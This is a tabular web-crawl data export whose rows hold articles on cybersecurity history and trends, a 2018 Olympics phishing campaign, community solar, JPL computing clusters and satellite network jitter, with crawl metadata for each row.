text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
The Evolution of Cybersecurity: Part 1
Written by: Lindsay McKay
The first hackers were not criminals and had no malicious intent. They were seen as technology enthusiasts, and their only goals were to explore, optimize, and tinker. This type of hacker flourished in the 60s and 70s; it was not until the 1980s when turnkey personal computers were widely available that a new type of hacker emerged. These new hackers were concerned with personal gain. Instead of using their technological know-how for improving computers, they used it for criminal activities, including pirating software, creating malicious viruses, and breaking into systems to steal sensitive information. But wait, the first computer worm was developed in 1971 before the internet, so how did that work? Let's look through the history and evolution of the internet and cybersecurity, from the ARPANET to the commercialization of anti-virus software and the beginning of the cybersecurity industry getting recognized.
The ARPANET was the precursor to the internet. The first time two computers communicated with one another was in 1961 in an MIT lab, using packet-switching technology. Sometime later, in 1969, the Pentagon’s Advanced Research Projects Agency concluded the development of ARPANET, with the interconnection of four university computers. The first message was sent on October 29, 1969, between the Standford Research Institute, the University of California-Santa Barbara, and the University of Utah install nodes. Stanford’s computer ultimately crashed before the message was completed.
In 1971, a developer working on the ARPANET developed the first computer worm known as ‘The Creeper’, a program that moves from one computer to another. To him, it was a fun experiment with the message reading: I’m the creeper, catch me if you can. To combat this intrusion, a colleague created the first cybersecurity program called ‘Reaper’, which scoured ARPANET to find and delete the worm. Reaper was not only the very first example of antivirus software, but it was also the first self-replicating program. This cheeky battle between two coworkers became a moment of cultural significance in exposing the vulnerabilities within interconnected computers.
From Cheeky to Malicious
Before the 1990s, only academics, librarians, engineers, military, and governments had access to the ARPANET. In 1991 the World Wide Web went public thanks to a British scientist, but prior to this, a computer worm known as the ‘Morris Worm' infected over 6000 computers (10% of the network) connected globally to the ARPANET. Again, this worm had no malicious intent and may have even been released unintentionally by an MIT graduate. The response to this worm was the creation of the Computer Emergency Response Team (CERT), whose role was to coordinate information and responses to computer vulnerabilities and security. CERTs would become the first big players in the cybersecurity industry. While they were able to fight and respond to viruses as they came out, they were very much response teams only working reactively and unable to prevent outbreaks.
Unfortunately, the ‘Morris Worm’ paved the way for the creation of malicious programs, which exploded with the launch of the World Wide Web and throughout the 90s. Emails became the main target of viruses, with the viruses’ I LOVE YOU’ and ‘Melissa’ infecting tens of millions of computers, causing a worldwide failure of email systems. During this time, the anti-virus industry was booming and responded with products like McAfee, Norton Antivirus, and Kaspersky, which detected threats by scanning all the files in a system and comparing them to a database containing “signatures” of known malware.
Cybersecurity Gets Recognized
People were becoming sick of only being reactive, and the need for regulation and available cybersecurity education and resources for professionals was becoming apparent. During this time, many non-profits and certification associations established themselves, one of those being the Computing Technology Industry Association (CompTIA). As of today, CompTIA is one of the most highly respected and reputable associations offering beginner to expert certification exams and partners with institutions worldwide to provide cybersecurity courses. In 1993, the first IT entry-level certification, the CompTIA A+ certification, was launched. Following that, in 1999, the CompTIA Network+ certification exam was launched for those specializing in network technologies. Around the year 2000, there was a need for an entry to intermediate level certification for professionals pursuing a career in information security, so CompTIA launched the CompTIA Security+ certification in 2002 to address this need. After the largest data breach in history (the attack on Yahoo), the information security industry was looking quite bleak. To tackle this gloomy time, CompTIA launched its first cybersecurity analyst certification, the CompTIA CySA+ certification. Through the exam prep course, professionals learn how to apply behavioural analytics to prevent and combat cyberattacks and support experts who play the role of a threat hunter.
Check out The Evolution of Cybersecurity: Part 2 to learn about different cybersecurity technologies, the rise of connected devices, cyberattacks on automobiles and more!
Are you prepared for an IT disaster? Check out How to handle an IT disaster without losing your cool on Innovation Networks. | <urn:uuid:30eaf55f-d67f-4192-bbba-53f84ca6e602> | CC-MAIN-2022-40 | https://technoedgelearning.ca/the-evolution-of-cybersecurity-part-1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00161.warc.gz | en | 0.960967 | 1,099 | 3.0625 | 3 |
Solstice’s mission is to enable the 80% of US citizens - and particularly those from deprived areas - who are unable to install rooftop solar arrays on their homes to benefit from community-generated solar power instead. Although the number of people currently locked out of the market seems high, it includes everyone from renters, low-income households and those whose houses do not receive enough sun to make it viable.
The idea works by setting up solar gardens in community spaces or solar farms on the rooftops of community buildings such as churches, schools and local employers. Community members sign up to the scheme without having to pay any upfront installation costs, and their array feeds electricity into the grid.
Households then simply receive their electricity as normal but are given credits on their bills for the energy produced, which amounts to savings of around 10% per year. They are also given access to an online management platform to sign either themselves or family and friends up to the scheme, manage their account, pay their bills and see how much they are saving.
The scheme’s first pilots were set up in 2015, but since then 13 projects have gone live in Massachusetts, New Jersey, Washington DC and just recently in New York. Between them, the arrays generate about nine megawatts of electricity, with each megawatt serving the needs of about 150 people. But the aim is to grow this capacity to 100 megawatts over the next couple of years in order to save 150,000 consumers about $36 million per year.
One way of doing this will be to launch an online marketplace over the next couple of months. The website will enable interested parties to enter their zip code into a search facility to see where the nearest project is to them. The idea here is that, although it is not necessary to live close to a solar garden to sign up to its services, it is a legal prerequisite that you reside in the same utilities zone.
But the most effective way of attracting new customers, believes founder and chief executive Stephanie Speirs, is to use the same viral community organising tactics that were employed when she managed field operations for former President Obama’s election campaign. She explains:
According to a Yale study, the adoption of solar is contagious so once one person does it, others follow. So if we sign up early adopters such as churches and workplaces, we see their congregations and workers sign up too. There’s a contagion effect.
Cost-effective business model
As to the not-for-profit organisation’s business model, Speirs points out that it partners with a number of solar technology developers, which install the arrays and pay Solstice to manage their customer base. She says:
We get money from the solar developers who pay us for managing their customers, which is what we’re good at. Government regulations mean that financing doesn’t come and projects aren’t built until you line up customers so that’s what we do.
Although a good number of commercial solar players in the US have gone bust lately, Speirs believes that Solstice’s approach is simply more cost-effective. She explains:
A lot of solar companies are going bust due to high customer acquisition costs. Solar is sold in just a few ways – there’s door-to-door canvassing or someone will have a stand in a home improvement store. Both are very effective but they’re also very expensive as it’s stranger-to-stranger contact. But we’re cheaper because we rely so much on peer-to-peer communication to enrol customers. There’s an element of trust in relation to energy and so recommendations need to come from a trusted source.
Because the US market for community solar is new and in the process of “proving itself”, the goal is to focus for now on the domestic market, before expanding out elsewhere, not least into the developing world. As Speirs concludes:
I’d been working in India and Pakistan, but I realised that I didn’t have to be halfway across the world to deal with solar access issues. Low-income people - like my mom - were unable to get solar access so I wanted to work in an environment that I understood and where I could make a real difference.
Each of the winners of GLG’s Social Impact Fellowship are on the cusp of change. They have taken what are in essence simple ideas and applied them to seemingly intractable situations where there is a genuine need for change, using technology as both an enabler and, as Speirs calls it, an “amplifier”. The next, and perhaps even trickier stage in some ways, will be to develop and grow their businesses in a long-term sustainable way. We wish them luck. | <urn:uuid:9da6ca33-aedd-4e01-99c9-03b64bb6c898> | CC-MAIN-2022-40 | https://diginomica.com/technology-social-good-energetic-initiative-solstice | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00161.warc.gz | en | 0.967416 | 996 | 2.859375 | 3 |
Cyberattacks in the first half of 2021 have escalated globally to affect virtually every industry. Earlier this year TechNewsWorld spoke with cybersecurity experts about the expanding threat landscape, imminent threats, and what can be done to counter the ongoing offensives against the IT systems of companies, organizations, and government agencies.
Some cybersecurity experts agree with a report by Cybersecurity Ventures and expect financial damages from cybercrime to reach $6 trillion by the end of this year. Industry studies show that cyberattacks are among the fastest-growing crimes in the United States.
Cyberattacks are absolutely on the rise. Based on everything we know and every single analyst we have spoken with, there is no doubt that attacks are increasing, according to Robert McKay, senior vice president, risk solutions at Neustar.
“Cybersecurity experts predict that in 2021 there will be a cyberattack incident every 11 seconds. This is nearly twice what it was in 2019 (every 19 seconds), and four times the rate five years ago (every 40 seconds in 2016),” he told TechNewsWorld.
The rapidly growing increase in cyberattacks worldwide comes at a hefty cost for businesses in order to better protect their computer networks from intrusions. Cyberattacks not only are increasing in frequency, but they are costing victims larger financial losses.
The Growing Price of Cyber Risk
Worldwide, cybercrime cost businesses, government agencies, and consumers in general more than $1 trillion in 2020, according to the data analyzed by researchers at Atlas VPN. That is around one percent of the global GDP.
While $945 billion was lost to cyber incidents, $145 billion was spent on cybersecurity. Those costs increased by more than 50 percent compared to 2018, when over $600 billion was spent to handle cybercrime.
But twenty percent of organizations worldwide have no plans on how to protect against cybercrime events, according to the Atlas VPN report. That leaves a gaping hole in networks for cybercriminals to extend their attack strategies to steal even millions of dollars more.
The only sure defense, warn cybersecurity experts, is to step up efforts to pass legislation that bolsters technological defenses. That may be the only way to alter the course of ongoing cyberattacks.
Despite all the efforts into protecting systems and data, cloud breaches are likely to increase in both velocity and scale, said John Kinsella, chief architect at Accurics about his company’s 2020 summer research report on the State of DevSecOps.
“This [analysis] comes as cloud breaches have been rampant over the last two years. More than 30 billion records have been exposed as a result of cloud infrastructure misconfigurations,” he told TechNewsWorld.
In order to keep pace with an evolving economy that requires more digital transformation, organizations must place cyber resilience and the practice of DevSecOps at the top of their priority list, he added.
Not Just in the Clouds
Much more results in the growing pace of cyberattacks than rampant migration to cloud storage and misconfigured cloud infrastructure. Still, misconfigurations in cloud infrastructure lead to data exposure and are among the biggest concerns for cyberthreats facing business and government agencies today, noted Kinsella.
Nearly 98 percent of all cyberattacks rely on some form of social engineering to deliver a payload such as malware or ransomware. One of the most successful attack formats cybercriminals use regularly to initiate a social engineering attack is through phishing emails. Therefore, threat actors distribute malware via email approximately 92 percent of the time.
Cloud use and the continued stampede to cloud services is not going away. That ongoing shift in computing practices must be managed with more vigilance.
COVID has accelerated organizations’ digital transformation. Therefore, the ability to set up workloads in the cloud and get them through compliance and security challenges is in demand, noted Mohit Tiwari, co-founder and CEO at Symmetry Systems.
“Part of the reason is that the workloads that had resisted moving to the cloud were exactly the highly regulated ones, and the forced move out of on-site data centers managed by IT staff is driving up demand for cloud-based compliance and security skills,” he told TechNewsWorld.
Thus, cloud-based security techniques will be vital in the fight to curtail the worsening cybersecurity landscape. These include learning to work with cloud-native identity and access management (IAM), he noted.
“Those looking after cloud-based security need to broadly learn to manage infrastructure through structured programs, instead of shell scripts pieced together. As networks and application tiers become ephemeral, the most important persistent asset for any enterprise will likely be their own and their customers’ data. So data-security on the cloud will be a major theme going forward,” he cautioned.
Providing Cloud Cover
The world pandemic has hastened the cyber intrusions. So has complacency and poor training among office workers and inadequate IT surveillance.
Organizations need to consider a balanced approach to training their employees and investing in automation tools to minimize the risks of cyberattacks, offeredBrendan O’Connor, CEO and co-founder at AppOmni. Extensive training and around-the-clock manual monitoring are not necessary when the right automation tools can complement the IT staff as they build up their skill set.
“IT workers specializing in security need to shift their focus to supporting the new model of business many enterprises are adopting. Some enterprises are shifting their business model to focus on virtual workforce, de-emphasizing the need to secure office networks,” O’Connor told TechNewsWorld.
In other cases, offices are being eliminated altogether. IT workers need to change their focus from traditional network security of a campus/office to application security of the work-anywhere model, he continued.
“With the employee location and devices under constant flux, organizations will rely on the consistency and security of cloud service applications. IT workers should look to the management and security of these SaaS (software as service) applications as the new skills and technology to embrace,” O’Connor said.
Over the next year, ransomware will continue to be the biggest threat and financial risk to enterprises, observed Joseph Carson, chief security scientist and advisory CISO at Thycotic. Most organizations should be very concerned about ransomware as the biggest cybersecurity challenge and threat, he advised.
“Organizations should prioritize to invest in security solutions that help reduce the risks and also plan and test an incident response plan to help ensure the business is resilient to high-risk attacks,” he told TechNewsWorld.
Ransomware continues to evolve into more than just a security incident. Cybercriminals now seek data breaches with organized cybercrime groups to steal the data before they encrypt on corporate servers. Companies are not just worried about getting their data back but also who it gets shared with publicly.
Cybercriminals use ransomware to target anyone, any company, and any government including hospitals and transportation industries at a time when they are under extreme pressure, Carson added.
Another major cybersecurity attack trend focuses on the protective tools and security vendors within the industry, noted Brandon Hoffman, chief information security officer at Netenrich. The tools that the industry relies on and their providers are becoming more targets for attacks.
“It is a big concern because practitioners need tools they can depend on for detection and defense. By crippling or repurposing the very tools meant to thwart these attempts, the adversaries stand to gain a complete upper hand in the ongoing battle to combat cyber threats,” Hoffman told TechNewsWorld.
“The attacks targeting security organizations and vendors were always high up on the adversary list, but success begets further success.”
Fighting the Battle
The trust factor is an internal battle of sorts between security vendors and the corporations hiring them for cyber protection. That trust must be constantly reassessed, suggested Tim Wade, technical director of the CTO Team at Vectra AI.
“Strategically, security practitioners must continue to pivot away from preventative-based security architecture into resilience-based security architecture,” Wade told TechNewsWorld.
That is where the focus shifts to accepting the reality that things will go wrong, but when they do, the impact is minimized through rapid detection, response, and recovery, he added. Vendors and suppliers have always been lucrative targets for adversaries.
Many of the cyberattackers belong to organized criminal gangs that are sanctioned by foreign nations. The best defense such adversaries is acknowledging that you cannot stop them. But then focus on making their lives as difficult as possible, Wade said.
Cybersecurity Higher Education
One of the often unspoken ways of safeguarding against cybersecurity assaults is through education. This approach goes beyond teaching company workers to be better aware of safe computing ideals. Rather, recruiting the next crop of computer specialists to pursue a degree in cybersecurity.
Cybersecurity prospers because so many professionals come from different backgrounds and skill sets, noted Heather Paunet, senior vice president at Untangle.
“Groups who are traditionally marginalized in other industries, when pivoting or starting a career in cybersecurity, can benefit from multiple industry-leading organizations offering certification programs,” she told TechNewsWorld.
The emerging field of cybersecurity is a very viable career path, noted Michael Kaczmarek, vice president of product management at Neustar. Industry reports show that the number of unfilled cybersecurity jobs is expected to grow by 35 percent.
“Given the increases in attacks and the changes in tactics used by bad actors and organizations, cybersecurity will most certainly be a career choice that will see net employment for the long term,” he told TechNewsWorld.
The demand for cybersecurity jobs has certainly increased in the past year, agreed Dov Lerner, security research lead at Cybersixgill. A career path in the field is a great choice for someone interested in IT and security.
“An increase in the number of tools utilized increases security operations and analytics complexity and requires an increase in personnel. However, according to a recent ESG survey, nearly 70 percent of security teams say it is difficult to recruit and hire additional SOC (security operations center) staff,” Lerner told TechNewsWorld.
Security analysts have the opportunity to impact more than just their specific industry. Cybersecurity reaches into the world of politics, economics, and other sectors of the world. While breaking into the field can be challenging, it is incredibly rewarding, he concluded. | <urn:uuid:00e18438-a9fd-47b9-b7f9-2f00cfe03873> | CC-MAIN-2022-40 | https://www.crmbuyer.com/story/the-cybersecurity-outlook-for-2021-and-beyond-87154.html?cat_id=111 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00361.warc.gz | en | 0.952718 | 2,166 | 2.671875 | 3 |
With the opening ceremonies of the 2018 Winter Olympic Games just days away, hundreds of thousands of spectators and competitors are arriving in PyeongChang County, South Korea. The Olympic Games are a grand showcase of athleticism and patriotism—but they also create security challenges, including the increased risk of cyber attacks.
When events of this magnitude occur, they are bound to become the target of opportunistic attacks by cybercriminals, and this year’s Olympic Games is no exception. McAfee Advanced Threat Research analysts have recently discovered an email phishing campaign primarily targeting organizations involved with providing infrastructure and support for the games. The emails contained a malicious payload that establishes an encrypted channel from the victim’s machine back to the attacker’s server, allowing them to execute commands remotely as well as install further malware.
Large events with many contractors are a lucrative target for cyber attacks. The Olympics faces unique challenges being a multinational event, as language barriers present opportunities for attacks that play on imperfect translations or lack of knowledge about government entities. In the attack uncovered by McAfee, the emails appeared as though they came from the National Counter-Terrorism Center (NCTC) in South Korea, which at the time was conducting drills in the region in preparation of the Games.
This recent incident is just one example of a cybersecurity issue in the Olympic Games. According to a 2017 report titled “Report on the Cybersecurity of Olympic Sports” from the UC Berkeley Center for Long-Term Cybersecurity, the most recent Olympic Games have faced a number of serious cybersecurity incidents. During the 2008 Beijing Olympics, security officials fielded 11 million to 12 million daily alerts, with roughly a half dozen falling into the imminent threat category, according to the report. And in the 2012 Summer Olympics in London, six major security incidents—five of which involved DDoS-related attacks—were brought to the attention of the event's CIO. Last year, at the conclusion of the Rio Olympic Games, Russian hackers pilfered medical records of athletes from the World Anti-Doping Agency.
While the U.S. won’t host the Olympic Games until 2028 in Los Angeles, U.S. officials are already considering cybersecurity threats for the high-profile event. According to the UC Berkeley report—which was supported by the Los Angeles Organizing Committee for the 2028 Olympics—the Olympic Games in the coming years are likely to face far more serious cyberattacks, and ones that will be more difficult to detect.
Security for large events such as the Olympics falls on all vendors, regardless of business type. For example, just one unsecured email server at one vendor has the potential become a relay for phishing emails directed at participants or government agencies. It’s important for all organizations and individuals participating in the Games to understand the most prominent risks, and diligently work to mitigate them.
While history shows us there are bound to be more cyber incidents because of the Games, let’s hope that with increased security efforts there will be little disruption at the hands of cyber criminals over the next few weeks. | <urn:uuid:e7da0fe5-46bb-4fd9-b083-4aeb43dd80ea> | CC-MAIN-2022-40 | https://blog.igicybersecurity.com/cyber-attacks-imminent-in-pyeongchang-olympic-games | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00361.warc.gz | en | 0.950327 | 628 | 2.921875 | 3 |
Accurately modeling climate issues is a huge computational task. The National Weather Service’s supercomputers, for instance, have a hard enough time generating accurate local weather forecasts just a few days out. So imagine trying to generate accurate forecasts on a global scale 50 years into the future. This is causing particular consternation when it comes to proving that man-made chemicals are causing global warming.
“Due to the complexity of climate systems and current limitations of climate models, it may take 10 or 20 years to develop clear observational or modeling proof of global warming causes,” says Dr. Jonathan H. Jiang, a scientist from the Microwave Limb Sounder (MLS) team at NASA’s Jet Propulsion Laboratory (JPL) in Pasadena, Calif. (See sidebar for explanation of what the team does.) “By that point it might be too late for us to prevent the climate changes.”
To speed the process, MLS is now hooked into the national TeraGrid, which connects large-scale Linux clusters, using 64-bit Intel Itanium processors, at the Argonne National Laboratory, Caltech, the National Center for Supercomputing Applications and the San Diego Supercomputer Center.
The sites are linked via 30-40 Gbps connections and have a combined computing capacity of 15 (soon to be 21+) teraflops and storage capacity of more than seven petabytes.
|What Is A ‘Microwave Limb Sounder’?|
|It is an instrument that detects naturally occurring microwaves in Earth’s upper atmosphere, or “limb.” (“Limb” is an astronomy term meaning “the apparent outer edge of a celestial object.”) The first MLS was part of the Upper Atmospheric Research Satellite and helped identify how chlorine compounds were deleting the ozone layer. The next MLS will be part of the Aura satellite, launching in January 2004. It will be addressing a broad range of climate change issues. For more information go to the MLS site.|
The MLS has also boosted its own local computing power. The team members were already outfitted with Linux workstations with dual 1GHz Pentium III processors and 2 GB of RAM. Since these systems are on same subnet, the 25 workstations were set up using homegrown software to act as a single parallel computing system. Applications are developed in house using Fortran 95.
Given the high-intensity computing needed to convert the raw satellite data into usable information, however, that still wasn’t enough power. Rather than adding a mainframe, the MLS team decided to add a cluster using the same software it was using to run the grid.
“We were quite pleased with the results we had gotten with our grid,” says Navnit Patel, a contractor from ERC Inc. who operates as the team’s Science Computing Facility Manager.
“We also wanted to have clusters of nodes
acting as a parallel system so that if one more client node went down it wouldn’t affect the cluster,” he said.
A key point in selecting a vendor for the cluster was that it had to operate seamlessly with the software already in place. The cluster would be supplementing rather than replacing the existing workstation grid, so JPL wanted it to run on the same distributed computing software. After testing the units from several manufacturers, they awarded the contract to IBM.
The new hardware consisted of 64 IBM X330 series 1U rack-mount servers, model 8674-11x, with dual 1 GHZ CPUs and 2 GB RAM. The operating system was Red Hat Linux 7.3. IBM had already installed and configured the hardware into three racks and had conducted extensive burn-in tests on all the systems.
An IBM technician came out to JPL to finish the installation. Since all the wiring had already been done at the factory, he just had to connect the three racks to the master node, install the management software and configure it master node and the clients.
“It was quite a smooth operation,” says Patel.
The users have access to master node right from their desktops. The user tells the master node how many nodes or CPUs that he wants to use to get the job done and the master node then allocates the job to the appropriate number of available client nodes.
“Everyone is using this cluster to its maximum capacity,” says Patel. “So far we are happy with the performance of the cluster.”
Of course, as Patel’s “maximum capacity” and “so far” imply, an upgrade it on its way. JPL has just ordered an additional 64 client servers for the cluster. This time they are coming from Linux NetworX Corp. (based in Salt Lake City) and come with dual 2GHz processors. Once these arrive, they will work together with the existing IBM servers, making a total of 256 CPUs available.
Patel attributes the success of his cluster to requiring the equipment be benchmarked with the software that would actually run on it. This is particularly applicable in a situation like JPL’s, in which all the software was written by the MLS scientists.
“The best advice I can give is to insist on a successful benchmark,” he says. “Any software you intend to run on cluster should be benchmarked.” | <urn:uuid:46df4a6e-b9eb-4a4b-a419-becb8d92cc16> | CC-MAIN-2022-40 | https://www.datamation.com/networks/linux-clusters-deployed-in-race-against-global-warming/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00361.warc.gz | en | 0.948817 | 1,126 | 3.609375 | 4 |
What is Jitter and should we care about it?
This blog is Part 2 of a 3 part blog and concentrates on jitter (variable latency). Part 1 dealt with distance, latencies and orbits and subsequent parts will discuss the effect of atmospheric conditions and choice of wavebands.
First, it’s worth noting that while the term jitter is used by network specialists and certain application performance engineers, it isn’t really a network term at all – it’s a communication engineer’s term – and essentially refers to the difference between when a timing signal should have been received and when it was actually received.
So, in an ideal world, if you transmit a signal (down a wire or as a wave) 1 Million times a second (1Mhz) at even spacing then that’s what you expect to receive: 1 pulse at exactly every microsecond (millionth of a second). That’s not to say that all the pulses might not all be delayed (perhaps due to distance), but the expectation is that they are delayed by the same amount and so the jitter is 0. Unfortunately real life is not like that and signals can arrive relatively too early, or too late. This is jitter.
Packet Delay Variation (PDV)
In networks, and application engineering, data is typically grouped together and transmitted as packets. So the correct term (for packet type jitter) is Packet Delay Variation (PDV) but we’ll use the term Jitter to mean the same thing i.e. PDV.
What is affected by Jitter?
Let’s begin with what isn’t really affected by Jitter – Connection orientated applications
Now, jitter doesn’t matter to most “standard” applications i.e. applications based on the TCP part of the IP protocol family. These include most “transactional” and “file transferring” applications like:
● Web – http and https
● Network file systems – CIFS (NetBIOS over TCP), NFS
● File transfer – ftp, sftp
● Custom TCP communications – various messengers, apps
● Video/Audio Services – Netflix, Internet radio (* we’ll come back to this one)
The reason for this is that they are not especially time-sensitive and are often themselves waiting for acknowledgement of successful packet delivery before they can transmit more data i.e. they are inherently jittery in themselves.
The jitter problem typically all starts when you are trying to stream live audio or video, a telephone call, live telemetry or timing protocols over a network. As mentioned, the network doesn’t send a bit stream, rather it generally sends it as a packet stream (the packet being the basic unit of transmission in most modern data networks) with a regular time gap between packets.
So, you try to send a packet containing audio samples (for example), say 1000 times a second so that the playback system can play them back as sounds, but they don’t arrive with that spacing due to jitter (PDV) and so the played sound is all over the place.
Wait, you say, that doesn’t actually happen in real life. No indeed, because two primary solutions to this have been adopted:
1. The application is not actually real-time!
A realization that the stream does not actually need to be real time e.g. internet radio, Netflix (see I said we’d be back here!) as you can buffer (receive in advance) a large chunk of data (20 seconds for example) and play the samples back evenly spaced, which (as discussed in the box out) will likely even have more than one sample in each packet.
You can do this because you know the encoding/decoding system (codec) and its data rate. You also know that it doesn’t matter if one consumer hears/sees the station/program a little later than another, in general.
2. It is real-time, but you can delay playback a bit
Our example here would be a telephone call. We clearly can’t delay the speech for many seconds as it interferes with our brain’s speech processing, as many of us have experienced when things go wrong on long distance telephone calls. But we can hold the packet playback back slightly.
The technique uses a jitter buffer (perhaps more properly should be called an anti-jitter buffer!). Packets are stored in the jitter buffer (in the correct order) and then played back at an even speed thus sorting out the audio. The problem here is that this buffer cannot be too large because “we” notice. Humans will usually notice round-trip voice delays of over 250ms. The ITU (International Telecommunications Union) recommends a maximum of 150 ms one-way latency (300ms round trip). Remember that (from Part 1) a satellite phone call via a GEO satellite will easily exceed 300ms even with no jitter present, though LEOs (like Iridium) and MEOs (like O3b) don’t suffer this basic very high latency due to them being much closer to us.
Streaming Audio Example
As an example, let’s design a streaming protocol for uncompressed audio CD data over a network. Now, CD audio has a stereo bit rate of 1.4112 Mbps. This is made up of 44,100 samples per second and each sample uses 16 bits per channel (so for stereo that’s 2 channels – 32bits per sample). I mentioned that data networks use packets, so we could put every 32 bit (4byte) sample into a packet and then send them evenly spaced to get 44.1K samples per second.
The problem is that packets have a minimum size and lots of overhead (addressing, checksum, minimum packet size etc). It would be like sending 4 passengers in a 40 seat coach – lots of overhead and waste. For Ethernet packets containing IPv4 and UDP formatted packets the overhead would be 14 + 20 + 8 +4 = 46 bytes – Just to send 4 bytes of data! And that completely ignores the fact that “Layer 2” frames like Ethernet have a minimum packet size – 64 bytes in the case of Ethernet. So for 4 bytes of valuable data we’d be sending 16 times that in headers and wasted space – a bit rate of ~18.5Mbps. Outrageously high for most networks and an impossible waste for a satellite network!
So instead we’ll decide to pack lots of audio samples into one larger packet, because the overhead will always be 46 bytes. A typical large packet is 1500 bytes of layer 2 payload, which has an overhead of 32 bytes (IPv4, UDP & Checksum) and so can carry (1500-32)/4 = 367 audio samples and our packet rate would need to be 44,100/367 = 120.16 packets per second – a pretty modest rate – about 1 packet every 10 milliseconds. However, our audio playback system now has to cope with that and store (buffer) incoming packets decode them and play back the individual samples at a steady rate. [In practice the codec we just “designed” above won’t be used, as one involving compression like MP3 will use far less I/O.
See below for how an original audio wave is sampled at various quality levels:
Applications/Protocols that can’t tolerate much jitter
It all comes down to how real-time your application needs to be. Perhaps it’s worth thinking about what “real-time” means. Techtarget.com has the following definition:
“Real-time is a level of computer responsiveness that a user senses as sufficiently immediate or that enables the computer to keep up with some external process (for example, to present visualizations of the weather as it constantly changes). Real-time is an adjective pertaining to computers or processes that operate in real time. Real time describes a human rather than a machine sense of time.”
I like that definition because they explain that real-time responsiveness is all relative to your need. If you’re controlling a space rocket you’ll likely need to respond far faster than if you’re having a conversation with a human. It’s all relative.
So, if you’re remote controlling an aircraft you might need real time to be pretty low in latency, and therefore having large jitter buffers to smooth out a jittery flow of packets coming from a control “joystick” won’t work.
These applications cannot therefore, use TCP over IP, the acknowledgment process alone could slow the process down too much and cause jitter. They, instead, tend to use an underlying datagram protocol like UDP which is not acknowledged. As these packets are not acknowledged, if their loss matters then some form of redundancy is required e.g. simple redundant designs might be to send a packet twice, or use a middle packet containing data from the preceding and next packets etc. These allow for a high packet error/loss rate but use a lot of extra bandwidth, so in practice schemes better suited to the likely error/loss rates are employed.
What creates Jitter?
So now we’ve looked at whether we should care about jitter. It’s worth understanding why it occurs.
Networks are pretty good at creating jitter even without help at all from any satellite equipment. As packets pass through routers (the junctions, roundabouts and rotaries of a data network) they may need to wait for packets from other streams and so they are queued and therefore, delayed. The next packet may not be similarly delayed or may be delayed even more – all of a sudden you have jitter.
Satellite networks also throw a few other things into the mix, but which of these you get depends on the satcoms design, and they are evolving. Examples include:
● Jitter introduced by the Terminal/Modem – Depending on the transmission model you may need to wait until it is your turn (slot) to transmit data up to the satellite, if other users in the same area are sending.
● In older designs where satellite had large footprints, again you would have to wait for your turn (slot) before data was transmitted to you
● In systems like Iridium, a LEO satellite constellation. Here, jitter will be highly variable, though base latency is relatively low, with satellites in constant motion. Packets go up to the nearest convenient satellite (in range) and then pass through the satellite constellation’s mesh before landing at the receiving terminal.
To an extent, GEO transmission issues are mitigated by Spot beams, in modern GEO satcoms systems, where transmission from the satellite is not the same to a whole large area, but rather divided into many focused spots, where each can have separate transmissions and so is not waiting on all the others.
Until modern satellites are deployed, more frequently this jitter will be prevalent in GEO satellite designs that were originally conceived more for broadcast communications (often TV), than unicast (point to point), but now with TV users wanting to watch TV “on-demand” these are being replaced by more modern satellites.
So again, should we care about Jitter?
● To TCP-based applications – http, https, cifs (NetBIOS), ftp, buffered video, buffered audio etc. mean (average) latency (as well as bandwidth and loss – discussed further in part 3) is the dominant characteristic – jitter simply affects the mean latency, but as a separate effect can be ignored
● To UDP-based applications which are real time, it really does matter:
-Control systems will not work properly
-Humans have trouble with delays in live video and voice calls and video conferencing
-Telemetry may be out of date
In other words, the effect depends on the application.
How can you test your applications with Satellite Jitter (and Latency, Errors, Bandwidth Limitation)?[If you read part 1 then you can skip to “The End” – the arguments are similar and you can “also” simulate jitter. If you didn’t please read on… ]
You need to test!
That may not be as formal as it sounds: we could say you need to try the application in the satellite network.
There are issues with testing or trying using actual (real) satellite networks though:
● Satellite time is expensive and the equipment not at all easy to deploy
● It will be just about impossible to mimic your or your customers’ real locations
● If you find an issue which needs attention, getting it to the developers for a solution will be difficult (and if the developers say they’ve sorted it out it is likely to be very difficult to retest)
● You won’t be able to try out other satellite environments e.g. MEO or LEO without purchasing them
● You won’t be able to have a rainstorm appear just when you need it during your testing
Using Satellite Network Emulators
People think of anything with the name “emulator” in it as some sort of complex mathematical device which predicts behaviours. They may be complex, but only internally. Externally we make them very straightforward. And, they don’t predict behaviour, you get to actually try out (“test”) your application using your real clients and servers just as though they were in the satellite network.
All you need to do is plug them in between a client device and the servers and set them for the satellite situation you want. You can even try out other options like LEO or MEO within seconds.
Plugging them in is easy because they have Ethernet ports, you don’t need any satellite equipment at all.
Want to know more – click here
Part 3 concentrates on Errors, Loss, the effect of atmospheric conditions and choice of wavebands. It will follow soon.
If you missed Part 1, it’s already posted and looks at Latency | <urn:uuid:233d6663-d850-47d9-a987-f0fb057f9343> | CC-MAIN-2022-40 | https://itrinegy.com/satellite-communications-blog-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00361.warc.gz | en | 0.940968 | 2,987 | 3.09375 | 3 |
zoka74 - stock.adobe.com
In the fight against epidemics, including the current Covid-19 coronavirus, medical staff are on the front line, risking their own lives to save the lives of others. But behind the lines the war is fought – or should be fought – by authorities, medical researchers, statisticians and computer scientists using an array of artificial intelligence (AI) and data science technologies.
The SARS-CoV2 or Covid-19 virus, which surpassed 500,000 confirmed cases and 23,000 deaths within three months of first detection (WHO statistics), appears to have taken most national governments by surprise – but it shouldn’t have.
